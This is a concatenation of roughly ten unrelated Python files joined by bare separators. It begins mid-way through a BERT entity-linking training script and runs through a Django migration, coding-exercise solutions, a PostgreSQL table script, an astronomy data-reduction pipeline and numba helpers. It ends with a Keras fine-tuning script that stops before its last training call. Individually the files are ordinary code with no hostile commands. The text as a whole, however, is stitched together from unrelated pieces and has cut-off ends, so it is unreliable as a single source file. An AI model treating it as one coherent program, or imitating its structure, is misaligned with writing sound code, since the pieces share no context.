"--num_candidates", type=int, default=10, help="Number of candidates to consider per mention"
)
parser.add_argument(
"--num_max_mentions", type=int, default=8, help="Maximum number of mentions in a document"
)
parser.add_argument(
"--ner", type=bool, default=False, help="Model will perform only BIO tagging"
)
parser.add_argument(
"--alternate_batch", type=bool, default=False, help="Model will perform either BIO tagging or entity linking per batch during training"
)
parser.add_argument(
"--ner_and_ned", type=bool, default=True, help="Model will perform both BIO tagging and entity linking per batch during training"
)
parser.add_argument(
"--gamma", type=float, default=0, help="Threshold for mention candidate prunning"
)
parser.add_argument(
"--lambda_1", type=float, default=1, help="Weight of the random candidate loss"
)
parser.add_argument(
"--lambda_2", type=float, default=0, help="Weight of the hard negative candidate loss"
)
parser.add_argument("--seed", type=int, default=42, help="random seed for initialization")
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html",
)
parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank")
parser.add_argument("--server_ip", type=str, default="", help="For distant debugging.")
parser.add_argument("--server_port", type=str, default="", help="For distant debugging.")
args = parser.parse_args()
if (
os.path.exists(args.output_dir)
and os.listdir(args.output_dir)
and args.do_train
and not args.overwrite_output_dir
):
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
args.output_dir
)
)
# Setup distant debugging if needed
if args.server_ip and args.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
if args.no_cuda:
args.n_gpu = 0
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank,
device,
args.n_gpu,
bool(args.local_rank != -1),
args.fp16,
)
# Set seed
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
args.model_type = args.model_type.lower()
config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
cache_dir=args.cache_dir if args.cache_dir else None,
)
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
pretrained_bert = PreDualEncoder.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# Add new special tokens '[Ms]' and '[Me]' to tag mention
new_tokens = ['[Ms]', '[Me]']
num_added_tokens = tokenizer.add_tokens(new_tokens)
pretrained_bert.resize_token_embeddings(len(tokenizer))
model = DualEncoderBert(config, pretrained_bert)
if args.local_rank == 0:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Training
if args.do_train:
if args.resume_path is not None:
# Load a trained model and vocabulary from a saved checkpoint to resume training
model.load_state_dict(torch.load(os.path.join(args.resume_path, 'pytorch_model-1000000.bin')))
tokenizer = tokenizer_class.from_pretrained(args.resume_path)
model.to(args.device)
logger.info("INFO: Checkpoint loaded successfully. Training will resume from %s", args.resume_path)
global_step, tr_loss = train(args, model, tokenizer)
logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
model_to_save.save_pretrained(args.output_dir)
tokenizer.save_pretrained(args.output_dir)
# Good practice: save your training arguments together with the trained model
torch.save(args, os.path.join(args.output_dir, "training_args.bin"))
# Load a trained model and vocabulary that you have fine-tuned
model.load_state_dict(torch.load(os.path.join(args.output_dir, 'pytorch_model-1000000.bin')))
tokenizer = tokenizer_class.from_pretrained(args.output_dir)
model.to(args.device)
# Evaluation
results = {}
if args.do_eval and args.local_rank in [-1, 0]:
tokenizer = tokenizer_class.from_pretrained(args.output_dir, do_lower_case=args.do_lower_case)
checkpoints = [args.output_dir]
if args.eval_all_checkpoints:
checkpoints = list(
os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + "/**/" + WEIGHTS_NAME, recursive=True))
)
logging.getLogger("transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
logger.info("Evaluate the following checkpoints: %s", checkpoints)
for checkpoint in checkpoints:
global_step = checkpoint.split("-")[-1] if len(checkpoints) > 1 else ""
prefix = checkpoint.split("/")[-1] if checkpoint.find("checkpoint") != -1 else ""
model.load_state_dict(torch.load(os.path.join(checkpoint, 'pytorch_model-1000000.bin')))
model.to(args.device)
result = evaluate(args, model, tokenizer, prefix=prefix)
result = dict((k + "_{}".format(global_step), v) for k, v in result.items())
results.update(result)
return results
# Script entry point: run the training/evaluation driver defined above.
if __name__ == "__main__":
    main()
|
# 2. Write a python program for the following:
# Input the string “Python” as a list of characters from console, delete at least 2 characters, reverse the resultant string and print it.
# Read the input as a list of characters, drop the leading character,
# reverse what remains, then drop the leading character of the reversal
# (equivalently: strip the first and last characters and reverse the rest).
chars = list(input("Enter the text to be processed: "))
trimmed = "".join(chars)[1:]
reversed_text = trimmed[::-1]
final_text = reversed_text[1:]
print("Output string obtained: ", final_text)
|
# Generated by Django 3.2.4 on 2021-07-13 08:03
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the data_aggregator app:
    renames Participation.time_tardy to time_total and adds the nullable
    max_page_views / max_participations integer columns."""

    dependencies = [
        ('data_aggregator', '0012_alter_jobtype_type'),
    ]
    operations = [
        # Rename keeps the existing column data; only the name changes.
        migrations.RenameField(
            model_name='participation',
            old_name='time_tardy',
            new_name='time_total',
        ),
        # New columns are nullable so existing rows need no default backfill.
        migrations.AddField(
            model_name='participation',
            name='max_page_views',
            field=models.IntegerField(null=True),
        ),
        migrations.AddField(
            model_name='participation',
            name='max_participations',
            field=models.IntegerField(null=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
def revcomp(dna):
    """Return the reverse complement of a DNA string (A<->T, C<->G).

    Replaces the original chain of case-shuffling str.replace() calls with a
    single translation table, which is both clearer and single-pass.
    """
    return dna.translate(str.maketrans("ACGT", "TGCA"))[::-1]

if __name__ == "__main__":
    # Read one DNA string from the Rosalind input file and write its
    # reverse complement; context managers guarantee the files are closed.
    with open('rosalind_revc.txt', 'r') as fid, open('main.out', 'w') as output:
        s = fid.readline().strip()
        output.write("%s" % (revcomp(s)))
|
#
# @lc app=leetcode.cn id=509 lang=python3
#
# [509] 斐波那契数
#
# @lc code=start
class Solution:
    def fib(self, n: int) -> int:
        """Bottom-up iterative Fibonacci: F(0)=0, F(1)=1, O(n) time, O(1) space."""
        if n <= 1:
            return n
        prev, curr = 0, 1
        step = 1
        # Advance the pair (F(k-1), F(k)) until k reaches n.
        while step < n:
            prev, curr = curr, prev + curr
            step += 1
        return curr
# """DP: 自顶向下"""
# # 31/31 cases passed (1172 ms)
# # Your runtime beats 5.28 % of python3 submissions
# # Your memory usage beats 5.13 % of python3 submissions (15.1 MB)
# if n <= 1:
# return n
# seen = {0: 0, 1: 1}
# if n-1 not in seen and n-2 not in seen:
# seen[n-2] = self.fib(n-2)
# seen[n-1] = self.fib(n-1)
# elif n-1 not in seen and n-2 in seen:
# seen[n-1] = self.fib(n-1)
# return seen[n-1] + seen[n-2]
# @lc code=end
|
#!/usr/bin/python
# createTables.py
import psycopg2
import sys
# NOTE(review): this is Python 2 code (print statements, `except Type, e`
# syntax) — it will not run under Python 3 without porting.
# Creates the `jobs` table plus one result table per NPB benchmark id.
con = None
try:
    # Connect to the local 'devel' database as user 'mpozulp'.
    con = psycopg2.connect(database='devel', user='mpozulp')
    cur = con.cursor()
    print 'Creating jobs table'
    cur.execute("CREATE TABLE jobs ( \
    jobid INT PRIMARY KEY, \
    date CHAR(35), \
    ncpus INT, \
    procmodel CHAR(3), \
    modules TEXT[], \
    nodes TEXT[] \
    )")
    # "is" is quoted because it is a reserved word in SQL.
    for npbid in ('bt','cg','ep','ft','\"is\"','lu','mg','sp'):
        print 'Creating ' + npbid + ' table'
        cur.execute("CREATE TABLE " + npbid + " ( \
        jobid INT , \
        class CHAR(1), \
        nprocs INT, \
        cflags text, \
        runtime DOUBLE PRECISION, \
        mflops DOUBLE PRECISION, \
        verif BOOLEAN, \
        PRIMARY KEY(jobid, mflops) \
        )")
    con.commit()
except psycopg2.DatabaseError, e:
    # Roll back the partial DDL on any database error, report, and exit non-zero.
    if con:
        con.rollback()
    print 'Error %s' %e
    sys.exit(1)
finally:
    # Always release the connection, success or failure.
    if con:
        con.close()
|
from flask_restplus import Api
from .authenticate_api import api as ns_authenticate
from .park_api import api as ns_park
from .generate_parking_lot_api import api as ns_generate_parking_lot
# URL prefix shared by every versioned endpoint.
API_PREFIX = '/pp/v1'
# authorizations = {}

api = Api()

# Register each namespace under its versioned path (order preserved).
_NAMESPACE_ROUTES = (
    (ns_authenticate, '/authenticate'),
    (ns_generate_parking_lot, '/generateParkingLot'),
    (ns_park, '/park'),
)
for _ns, _suffix in _NAMESPACE_ROUTES:
    api.add_namespace(_ns, path=API_PREFIX + _suffix)
|
from PIL import Image
import numpy as np
import pandas as pd
import sys
# pass in pixel1, and pixel2 as np arrays
def directional_derivative(pixel1, pixel2):
    """Component-wise difference pixel1 - pixel2 between two pixel vectors."""
    delta = pixel1 - pixel2
    return delta
# pass in a pixel as an np array
def norm(pixel):
    """Squared Euclidean norm of a pixel vector (note: no square root taken)."""
    return np.dot(pixel, pixel)
def edge_detection(pixel, epsilon, image, n):
    """Blacken *pixel* if its squared distance to any neighbour exceeds epsilon.

    pixel   : (x, y) index into image
    epsilon : threshold compared against the *squared* colour distance
    image   : H x W x C array, modified in place
    n       : half-width of the neighbourhood window (precision)

    Fixes over the original: the old code iterated window *rows* instead of
    individual pixels, used `image[x, y] != p` on arrays (ValueError for
    multi-channel pixels), crashed on max() of an empty list, and could
    overflow for unsigned dtypes during the subtraction.
    """
    x, y = pixel
    # Clamp window start at 0 — a negative slice start would wrap around.
    window = image[max(x - n, 0):x + n + 1, max(y - n, 0):y + n + 1]
    center = np.asarray(image[x, y], dtype=np.float64)
    # Flatten the window into a list of pixels and compute per-pixel
    # directional derivatives (center - neighbour) in float to avoid overflow.
    neighbours = window.reshape(-1, window.shape[-1]).astype(np.float64)
    diffs = center - neighbours
    norms = np.einsum('ij,ij->i', diffs, diffs)   # squared norms, one per neighbour
    if norms.size and norms.max() > epsilon:
        image[x, y] = 0                           # set pixel to black
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################
# #
# create_sib_data.py: create sib data for report #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Mar 03, 2021 #
# #
#############################################################################
import sys
import os
import string
import re
import math
import unittest
import astropy.io.fits as pyfits
import time
import Chandra.Time
import random
#
#--- reading directory list
#
# Each line of the house-keeping file has the form "<value> : <variable_name>";
# exec() binds every listed name (e.g. bin_dir, mta_dir, cor_dir, data_dir)
# as a module-level variable.  NOTE(review): exec on file contents is a code
# injection hazard if the file is ever writable by others.
path = '/data/mta/Script/ACIS/SIB/house_keeping/dir_list_py'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    exec("%s = %s" %(var, line))
#
#--- append path to a private folders
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
import sib_corr_functions as scf
import ccd_comb_plot as ccp
import update_html as uph
#
#--- temp writing file name
#
# Pseudo-random suffix keeps concurrent runs from clobbering each other's temp file.
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------------
#-- create_report: process the accumulated sib data and create a month long data fits files
#-----------------------------------------------------------------------------------------
def create_report(year='', mon=''):
    """
    process the accumulated sib data and create a month long data fits files
    input:  year    --- year; optional, if it is not given, the script will assign
            mon     --- mon; optional, if it is not given, the script will assign
    read from <lev>/Outdir/lres/*fits
    output: lres_ccd<ccd>_merged.fits in ./Data/ directory
    """
#
#--- find data periods
#
    [begin, end, syear, smon, eyear, emon] = set_date(year, mon)
#
#--- process all data for the month
#--- Lev2 must run first: find_excess_file() for Lev1 mirrors the files
#--- that the Lev2 pass already moved aside
#
    create_sib_data("Lev2", begin, end, syear, smon)
    create_sib_data("Lev1", begin, end, syear, smon)
#
#--- plot data and update html pages
#
    ccp.ccd_comb_plot('normal')
    uph.update_html()
    uph.add_date_on_html()
#
#--- clean up directories
#
    cleanup_sib_dir("Lev1", smon, syear)
    cleanup_sib_dir("Lev2", smon, syear)
#-----------------------------------------------------------------------------------------
#-- create_sib_data: create sib data for report --
#-----------------------------------------------------------------------------------------
def create_sib_data(lev, begin, end, syear, smon):
    """
    create sib data for report
    input:  lev     --- level of data either Lev1 or Lev2
            begin   --- start time <yyyy>:<ddd>:<hh>:<mm>:<ss>
            end     --- stop time <yyyy>:<ddd>:<hh>:<mm>:<ss>
            syear   --- year of the processed month
            smon    --- month of the processed month
    output: combined data, plots, and updated html pages
    """
#
#--- correct factor
#
    correct_factor(lev)
#
#--- exclude all high count rate observations
#
    find_excess_file(lev)
#
#--- combine the data
#
    sib_corr_comb(begin, end , lev)
#
#--- make data directory; month is zero padded: Data_<yyyy>_<mm>
#
    lmon = str(smon)
    if smon < 10:
        lmon = '0' + lmon
    if lev == 'Lev1':
        dname = data_dir + 'Data_' + str(syear) + '_' + lmon
    else:
        dname = data_dir2 + 'Data_' + str(syear) + '_' + lmon
    cmd = 'mkdir -p ' + dname
    os.system(cmd)
    cmd = 'mv -f ' + cor_dir + lev + '/Data/* ' + dname
    os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- set_date: set the data for the last month ---
#-----------------------------------------------------------------------------------------
def set_date(year, mon):
    """
    set the data period for the last month
    input:  year    --- year; optional
            mon     --- mon; optional
    output: begin   --- starting date in <yyyy>:<ddd>:<hh>:<mm>:<ss>
            end     --- stopping date in <yyyy>:<ddd>:<hh>:<mm>:<ss>
            syear   --- year of the starting time
            smon    --- month of the starting time
            eyear   --- year of the ending time
            emon    --- month of the ending time
    """
#
#--- if the year/month are not give, find today's date information (in local time)
#
    if year == '':
        tlist = time.localtime()
#
#--- set data time interval to the 1st of the last month to the 1st of this month
#
        eyear = tlist[0]
        emon = tlist[1]
    else:
        eyear = year
        emon = mon + 1
        # roll the end month over a year boundary
        if emon > 12:
            emon = 1
            eyear += 1
    tline = str(eyear) + ' ' +str(emon) + ' 1'
    tlist = time.strptime(tline, "%Y %m %d")
    # tlist[7] is tm_yday: day-of-year of the 1st of the end month
    eyday = tlist[7]
    lyday = mcf.add_leading_zero(eyday, 3)
    end = str(eyear) + ':' + str(lyday) + ':00:00:00'
    # start is one month earlier, rolling back over a year boundary if needed
    syear = eyear
    smon = emon - 1
    if smon < 1:
        syear -= 1
        smon = 12
    tline = str(syear) + ' ' +str(smon) + ' 1'
    tlist = time.strptime(tline, "%Y %m %d")
    syday = tlist[7]
    lyday = mcf.add_leading_zero(syday, 3)
    begin = str(syear) + ':' + str(lyday) + ':00:00:00'
    return [begin, end, syear, smon, eyear, emon]
#-----------------------------------------------------------------------------------------
#-- cleanup_sib_dir: clean up the working directories --
#-----------------------------------------------------------------------------------------
def cleanup_sib_dir(lev, mon, year):
    """
    clean up the working directories
    input:  lev  --- data level ('Lev1' or 'Lev2')
            mon  --- month of the data processed
            year --- year of the data processd
    output: none (lres is archived with a <mon><year> tag; scratch dirs removed)
    """
    outdir = cor_dir + lev + '/Outdir/'
    month_tag = mcf.change_month_format(mon).lower()
    # keep the lres results by renaming the directory with a month/year tag
    os.system('mv ' + outdir + 'lres ' + outdir + 'lres_' + month_tag + str(year) + '_modified')
    # the remaining working directories are disposable
    for scratch in ('ctirm_dir', 'filtered', 'hres'):
        os.system('rm -rf ' + outdir + scratch)
#-----------------------------------------------------------------------------------------
#-- correct_factor: adjust lres reuslts files for the area removed as the sources remvoed
#-----------------------------------------------------------------------------------------
def correct_factor(lev):
    """
    adjust lres results files for the area removed as the sources removed
    input:  lev --- level 1 or 2
    output: adjusted fits files in lres
    bug fix: the dmtcalc/mv/warning commands previously referenced `ent`
             (the stale loop variable of the ratio-table loop) instead of
             the current fits file `fits`, so every correction was applied
             to the wrong file name.
    """
#
#--- read all correction factor information; each line: "<msid...ccd<n>...> : <ratio>"
#
    ifile = cor_dir + lev + '/Reg_files/ratio_table'
    data = mcf.read_data_file(ifile)
    ratio = {}
    for ent in data:
        atemp = re.split(':', ent)
        rate = float(atemp[1].strip())
        btemp = re.split('N', atemp[0])
        mc = re.search('_', btemp[0])
        if mc is not None:
            ctemp = re.split('_', btemp[0])
            msid = ctemp[0]
        else:
            msid = btemp[0]
        ctemp = re.split('ccd', atemp[0])
        dtemp = re.split('_', ctemp[1])
        ccd = dtemp[0]
#
#--- ratios are keyed by "<msid>.<ccd>"
#
        ind = str(msid) + '.' + str(ccd)
        ratio[ind] = rate
#
#--- find all fits file names processed
#
    cmd = 'ls ' + cor_dir + lev + '/Outdir/lres/mtaf*.fits > ' + zspace
    os.system(cmd)
    data = mcf.read_data_file(zspace, remove=1)
    for fits in data:
        atemp = re.split('N', fits)
        btemp = re.split('mtaf', atemp[0])
        msid = btemp[1]
        mc = re.search('_', msid)
        if mc is not None:
            ctemp = re.split('_', msid)
            msid = ctemp[0]
        atemp = re.split('acis', fits)
        btemp = re.split('lres', atemp[1])
        ccd = btemp[0]
        ind = str(msid) + '.' + str(ccd)
        try:
            div = ratio[ind]
        except KeyError:
            continue
        if div >= 1:
            continue
#
#--- correct the observation rate by dividing by the ratio
#--- (all sources removed area)/(original area)
#
        elif div > 0:
            line = 'SSoft=SSoft/' + str(div) + ',Soft=Soft/'
            line = line + str(div) + ',Med=Med/' + str(div) + ','
            line = line + 'Hard=Hard/' + str(div) + ',Harder=Harder/'
            line = line + str(div) + ',Hardest=Hardest/' + str(div)
            cmd = 'dmtcalc infile =' + fits + ' outfile=out.fits expression="'
            cmd = cmd + line + '" clobber=yes'
            scf.run_ascds(cmd)
            cmd = 'mv out.fits ' + fits
            os.system(cmd)
        else:
            print("Warning!!! div < 0 for " + str(fits))
            continue
#-----------------------------------------------------------------------------------------
#-- find_excess_file: find data with extremely high radiation and remove it --
#-----------------------------------------------------------------------------------------
def find_excess_file(lev = 'Lev2'):
    """
    find data with extremely high radiation and remove it.
    this is done mainly in Lev2; the Lev1 branch just mirrors the files the
    Lev2 pass already moved aside (so run the Lev2 pass first)
    input:  lev --- level. default Lev2 (other option is Lev1)
    output: excess radiation data fits files in ./lres/Save/.
    """
    if lev == 'Lev2':
        lres = cor_dir + lev + '/Outdir/lres/'
        cmd = 'ls ' + lres + 'mtaf*fits > ' + zspace
        os.system(cmd)
        data = mcf.read_data_file(zspace, remove=1)
        cmd = 'mkdir ' + lres + 'Save'
        os.system(cmd)
        for ent in data:
#
#--- dump the fits table to ascii so the band columns can be averaged
#
            cmd = 'dmlist ' + ent + ' opt=data > ' + zspace
            try:
                scf.run_ascds(cmd)
            except:
                continue
            out = mcf.read_data_file(zspace, remove=1)
            ssoft = 0.0
            soft = 0.0
            med = 0.0
            hard = 0.0
            harder = 0.0
            hardest = 0.0
            tot = 0.0
            for val in out:
                atemp = re.split('\s+', val)
#
#--- data rows start with a number; header/blank rows fail float() and are skipped
#
                try:
                    chk = float(atemp[0])
                    ssoft += float(atemp[6])
                    soft += float(atemp[7])
                    med += float(atemp[8])
                    hard += float(atemp[9])
                    harder += float(atemp[10])
                    hardest += float(atemp[11])
                    tot += 1.0
                except:
                    continue
            if tot > 1:
                ssoft /= tot
                soft /= tot
                med /= tot
                hard /= tot
                harder /= tot
                hardest /= tot
#
#--- thresholds differ for acis6; averages above the limit flag the file
#
            mc = re.search('acis6', ent)
            chk = 0
            if mc is not None:
                if (med > 200):
                    chk = 1
            else:
                if (soft > 500) or (med > 150):
                    chk = 1
            if chk > 0:
                cmd = 'mv ' + ent + ' ' + lres + 'Save/.'
                os.system(cmd)
    else:
#
#--- for Lev1, we move the files which removed in Lev2. we assume that we already
#--- run Lev2 on this function
#
        epath = cor_dir + '/Lev2/Outdir/lres/Save/'
        if os.listdir(epath) != []:
            cmd = 'ls ' + cor_dir + '/Lev2/Outdir/lres/Save/*fits > ' + zspace
            os.system(cmd)
            data = mcf.read_data_file(zspace, remove=1)
            l1_lres = cor_dir + '/Lev1/Outdir/lres/'
            l1_dir = l1_lres + '/Save/'
            cmd = 'mkdir ' + l1_dir
            os.system(cmd)
            for ent in data:
#
#--- extract obsid and ccd from the Lev2 file name to locate the Lev1 twin
#
                atemp = re.split('mtaf', ent)
                btemp = re.split('N', atemp[1])
                mc = re.search('_', btemp[0])
                if mc is not None:
                    ctemp = re.split('_', btemp[0])
                    obsid = ctemp[0]
                else:
                    obsid = btemp[0]
                atemp = re.split('acis', ent)
                btemp = re.split('lres', atemp[1])
                ccd = btemp[0]
                cid = 'acis' + str(ccd) + 'lres_sibkg.fits'
                cmd = 'mv ' + l1_lres + 'mtaf' + obsid + '*' + cid + ' ' + l1_dir + '/.'
                os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- sib_corr_comb: combined fits files into one per ccd --
#-----------------------------------------------------------------------------------------
def sib_corr_comb(start, stop, lev):
    """
    combined fits files into one per ccd
    input:  start   --- start time of the interval <yyyy>:<ddd>:<hh>:<mm>:<ss>
            stop    --- stop time of the interval <yyyy>:<ddd>:<hh>:<mm>:<ss>
            lev     --- data level "Lev1" or "Lve2"
    output: combined data: lres_ccd<ccd>_merged.fits in Data directory
    fixes:  added the missing space between outBlock="" and columnList="" in
            the dmmerge command (they were fused into one malformed token);
            removed the unused head/btemp locals.
    """
#
#--- convert the time to seconds from 1998.1.1
#
    tstart = Chandra.Time.DateTime(start).secs
    tstop = Chandra.Time.DateTime(stop).secs
#
#--- make a list of data fits files
#
    lres = cor_dir + lev + '/Outdir/lres/'
    cmd = 'ls ' + lres + '*fits > ' + zspace
    os.system(cmd)
    data = mcf.read_data_file(zspace, remove=1)
#
#--- initialize ccd_list
#
    ccd_list = [[] for x in range(0, 10)]
    for ent in data:
#
#--- check whether the data are inside of the specified time period
#
        [tmin, tmax] = find_time_interval(ent)
        if tmin >= tstart and tmax <= tstop:
#
#--- add the fits file to the list of its ccd (file name contains acis<ccd>)
#
            for ccd in range(0, 10):
                chk = 'acis' + str(ccd)
                mc = re.search(chk, ent)
                if mc is not None:
                    ccd_list[ccd].append(str(ent))
                    break
#
#--- combined all fits files of a specific ccd into one fits file
#
    for ccd in range(0, 10):
        if len(ccd_list[ccd]) > 0:
#
#--- the first of the list is simply copied to temp.fits
#
            cmd = 'cp ' + ccd_list[ccd][0] + ' temp.fits'
            os.system(cmd)
            for k in range(1, len(ccd_list[ccd])):
                cmd = 'dmmerge "' + ccd_list[ccd][k]
                cmd = cmd + ',temp.fits" outfile=zmerged.fits outBlock=""'
                cmd = cmd + ' columnList="" clobber="yes"'
                try:
                    scf.run_ascds(cmd)
                except:
                    continue
                cmd = 'mv ./zmerged.fits ./temp.fits'
                os.system(cmd)
            cmd = 'mv ./temp.fits ' + cor_dir + lev + '/Data/lres_ccd'
            cmd = cmd + str(ccd) + '_merged.fits'
            os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- find_time_interval: find time interval of the fits file --
#-----------------------------------------------------------------------------------------
def find_time_interval(fits):
    """
    find time interval of the fits file
    input:  fits --- fits file name
    output: [tmin, tmax] --- start and stop time in seconds from 1998.1.1
    fix:    the HDU list is now opened in a context manager so the file
            handle is always closed (the original leaked one per call).
    """
    with pyfits.open(fits) as fout:
        tout = fout[1].data['time']
        # compute the extrema while the file (and any memmap) is still open
        tmin = min(tout)
        tmax = max(tout)
    return [tmin, tmax]
#-----------------------------------------------------------------------------------------
if __name__ == '__main__':
    # Optional command line arguments: <year> <month>; without them the
    # report covers the previous calendar month.
    if len(sys.argv) == 3:
        create_report(year=int(sys.argv[1]), mon=int(sys.argv[2]))
    else:
        create_report()
|
from numba import jit
# Per-method, per-wave-type integer codes.
# NOTE(review): these appear to select solver implementations in jitted
# dispersion routines — confirm against the callers.
ifunc = {
    "dunkin": {"love": 1, "rayleigh": 2},
    "fast-delta": {"love": 1, "rayleigh": 3},
}
# Column index of each model parameter in the layered-model array.
ipar = {
    "thickness": 0,
    "velocity_p": 1,
    "velocity_s": 2,
    "density": 3,
}
def jitted(*args, **kwargs):
    """Custom :func:`jit` that forces the project-wide compilation options.

    Caller-supplied keyword options are kept unless they collide with the
    forced defaults below, which always win.
    """
    options = {
        **kwargs,
        "nopython": True,
        "nogil": True,
        "fastmath": True,
        # "boundscheck": False,
        "cache": True,
    }
    return jit(*args, **options)
|
# 各个不同网络的冻结与微调
# 冻结和微调
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam, SGD
import numpy as np
from keras.applications import ResNet50, VGG19, InceptionV3, MobileNet, NASNetMobile, Xception,DenseNet121
import matplotlib.pyplot as plt
import gc
# tf.test.gpu_device_name()
model_name = "DenseNet121"  # backbone to use: ResNet50, VGG19, InceptionV3, MobileNet, NASNetMobile, DenseNet121
train_epochs0 = 5  # number of epochs with the backbone frozen
train_epochs1 = 7  # number of fine-tuning epochs
ad = 0.0001  # fine-tuning learning rate (the frozen stage uses the default 0.001)
def show_history_mse2(history0, history1):  # plot the MSE curves
    """Plot and save train/validation loss across the frozen stage
    (history0) followed by the fine-tuning stage (history1), then print
    the raw loss lists."""
    plt.plot(history0.history['loss'] + history1.history['loss'])
    plt.plot(history0.history['val_loss'] + history1.history['val_loss'])
    plt.title(model_name + ' mse')
    plt.ylabel('loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Test'], loc='upper left')
    plt.savefig('drive/app/' + model_name + '_mse.jpg', dpi=200)
    plt.show()
    # print loss and val_loss
    print(history0.history['loss'] + history1.history['loss'])
    print(history0.history['val_loss'] + history1.history['val_loss'])
def prepare_data():  # load the data
    """Load X/Y arrays from drive/app, rescale X, and split into
    train (first 5000 samples) and test (the rest)."""
    print("prepare data")
    X = np.load('drive/app/X_data.npy')
    Y = np.load('drive/app/Y_data.npy')
    # bring X onto the same order of magnitude as Y
    X = X / 25
    # slice into train/test partitions
    x_train = X[:5000]
    y_train = Y[:5000]
    x_test = X[5000:]
    y_test = Y[5000:]
    del X
    del Y
    c = gc.collect()  # reclaim the memory of the full arrays
    print(c)
    return (x_train, y_train, x_test, y_test)
def change_model(model0):  # select the backbone model
    """Return an ImageNet-pretrained backbone (no top, global average pooling).

    model0 --- one of 'ResNet50', 'VGG19', 'InceptionV3', 'Xception',
               'DenseNet121'.
    MobileNet is excluded because it rejects input_shape=(220, 220, 3);
    NASNetMobile only accepts that shape with weights=None.

    Raises ValueError for an unknown name (the original fell through and
    crashed with an unrelated NameError on `tr_model`).
    """
    backbones = {
        "ResNet50": ResNet50,
        "VGG19": VGG19,
        "InceptionV3": InceptionV3,
        "Xception": Xception,
        "DenseNet121": DenseNet121,
    }
    if model0 not in backbones:
        raise ValueError("unsupported model name: %s" % model0)
    return backbones[model0](include_top=False, weights='imagenet',
                             input_shape=(220, 220, 3), pooling='avg')
if __name__ == '__main__':
    x_train, y_train, x_test, y_test = prepare_data()
    transfer_model = change_model(model_name)
    # transfer_model = ResNet50(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
    model = Sequential()
    model.add(transfer_model)
    model.add(Dense(1, name="aaa"))
    # Stage 1: frozen training ------------------------------------------
    print("Frozen!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    # freeze the pretrained backbone so only the Dense head trains
    model.layers[0].trainable = False
    # print(transfer_model.summary())
    print(model.summary())
    print("compile")
    model.compile(loss='mean_squared_error', optimizer=Adam())
    print("fit")
    Hist = model.fit(x_train, y_train, epochs=train_epochs0, batch_size=64, validation_data=(x_test, y_test))
    model.save_weights('drive/app/weight.h5')
    print(Hist.history)
    # Stage 2: fine-tuning ---------------------------------------------
    print("Finetuning!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    # rebuild the model, restore stage-1 weights and make everything trainable
    model2 = Sequential()
    model2.add(transfer_model)
    model2.add(Dense(1, name="aaa"))
    model2.load_weights('drive/app/weight.h5', by_name=True)
    for layer in model2.layers:
        layer.trainable = True
    print(model2.summary())
    print("compile")
    model2.compile(loss='mean_squared_error', optimizer=Adam(lr=ad))
    print("fit")
